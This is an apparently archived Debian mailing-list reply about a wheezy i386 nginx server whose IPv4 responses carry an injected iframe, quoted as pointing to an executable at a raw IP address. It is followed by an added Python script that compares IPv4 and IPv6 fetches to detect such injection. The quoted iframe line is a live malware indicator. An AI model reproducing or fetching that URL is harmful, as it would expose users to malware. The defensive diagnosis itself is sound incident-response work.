Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 07:15:57PM +0900, Joel Rees wrote:
>
> > The lynx webrowser shows this as the first line of the webpages:
>
> Local on the machine in question or external?
External.
> > IFRAME: http://122.226.137.123:1111/yixi.exe
> >
> > It also appears in downloads using wget.
> > "view source" in firefox or chrome show nothing amiss.
External. I figure firefox and chrome discard the new line, since it's
not appropriate before the doctype.
> > It only appears on IPv4, not IPv6.
>
> Again, are the browsers local to the machine in question or accessing
> from the network?
External.
> Okay, so, if it isn't something on an external box hijacking the IP
> address of the box in question, it's a local process or set of
> processes hijacking port 80 and trying unsuccessfully to be a
> pass-through proxy.
Yes. The same as the rootkit in 64-bit squeeze last year.
> How much time/resources can you afford to spend on trying to pin the
> intrusion vector down?
>
> Although, I'd hesitate to use the box for anything important, even
> after a complete wipe/install, unless the BIOS can be safely restored
> from a write-protected backup image. And I'd try to be careful enough
> during the install that if the exploit were repeated, I'd notice
> immediately and thus be able to pin the thing more closely.
>
> Maybe build the server as a VM and take snapshots as you go. Or
> rebuild it on a different machine, with the old server reboot from a
> live CD before each major step and use the tools on the live CD to
> take the snapshots.
>
> --
> Joel Reese
This is a KVM virtual machine in a datacenter. No BIOS. I can wait a
few days to rebuild. It's off right now, I'm not going to trust it for
anything.
E Frank Ball frankb@efball.com
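The symptom described in this thread (an iframe line appearing ahead of the doctype, only when the page is fetched over IPv4) can be checked from an external host without trusting the suspect machine at all. The script below is an added example, not code from the thread or from any of its participants: it fetches the same path over IPv4 and over IPv6 with plain sockets (so nothing on the suspect box is consulted), reports any bytes that precede the first `<!DOCTYPE` or `<html`, extracts iframe `src` values from that prefix, and says whether the two responses differ. The host name, the `injected.invalid` URL in the sample responses, and the sample bodies themselves are constructed placeholders, not values from the thread.

```python
"""Compare IPv4 and IPv6 fetches of one page and flag content injected before the doctype."""
import re
import socket
import sys

# Constructed sample responses (not captured from any real server).
CLEAN = b"<!DOCTYPE html>\n<html><head><title>ok</title></head><body>hi</body></html>\n"
TAMPERED = (b'<iframe src="http://injected.invalid/payload.exe" width=0 height=0></iframe>\n'
            + CLEAN)

DOCTYPE_RE = re.compile(rb"<!doctype\b|<html\b", re.IGNORECASE)
IFRAME_SRC_RE = re.compile(rb'<iframe[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def leading_injection(body: bytes) -> bytes:
    """Return whatever precedes the first <!DOCTYPE or <html tag (b"" when nothing does)."""
    m = DOCTYPE_RE.search(body)
    if m is None:
        return body.strip()  # no document start at all: treat the whole body as suspect
    return body[: m.start()].strip()


def iframe_sources(chunk: bytes) -> list:
    """List the src attribute of every <iframe> found in the given bytes."""
    return [src.decode("latin-1") for src in IFRAME_SRC_RE.findall(chunk)]


def fetch_body(host: str, family: int, path: str = "/", port: int = 80,
               timeout: float = 5.0) -> bytes:
    """HTTP/1.0 GET over a socket of the requested address family; returns the body only.

    family is socket.AF_INET or socket.AF_INET6, so the same name is deliberately
    resolved and connected one way or the other rather than letting the resolver pick.
    """
    infos = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)
    if not infos:
        raise OSError(f"no address of family {family} for {host}")
    fam, typ, proto, _, addr = infos[0]
    with socket.socket(fam, typ, proto) as s:
        s.settimeout(timeout)
        s.connect(addr)
        request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n"
        s.sendall(request.encode("ascii"))
        raw = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            raw += chunk
    _head, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else raw


def compare_families(body_v4: bytes, body_v6: bytes) -> dict:
    """Summarise how the IPv4 and IPv6 responses for the same URL differ."""
    inj4 = leading_injection(body_v4)
    inj6 = leading_injection(body_v6)
    return {
        "identical": body_v4 == body_v6,
        "injected_v4": inj4,
        "injected_v6": inj6,
        "iframes_v4": iframe_sources(inj4),
        "iframes_v6": iframe_sources(inj6),
    }


if __name__ == "__main__":
    # Usage: python3 check_injection.py <hostname>   (no argument: run on the samples)
    if len(sys.argv) > 1:
        host = sys.argv[1]  # placeholder: the server under investigation
        report = compare_families(fetch_body(host, socket.AF_INET),
                                  fetch_body(host, socket.AF_INET6))
    else:
        report = compare_families(TAMPERED, CLEAN)
    for key, value in report.items():
        print(f"{key}: {value!r}")
```

A non-empty `injected_v4` with an empty `injected_v6` matches the pattern in the thread and points at something sitting between the network and nginx on the IPv4 path rather than at the site content itself, which is why the comparison is done from outside and why the next step is to look at what is actually bound to port 80 on the host from a trusted boot medium rather than from the running system.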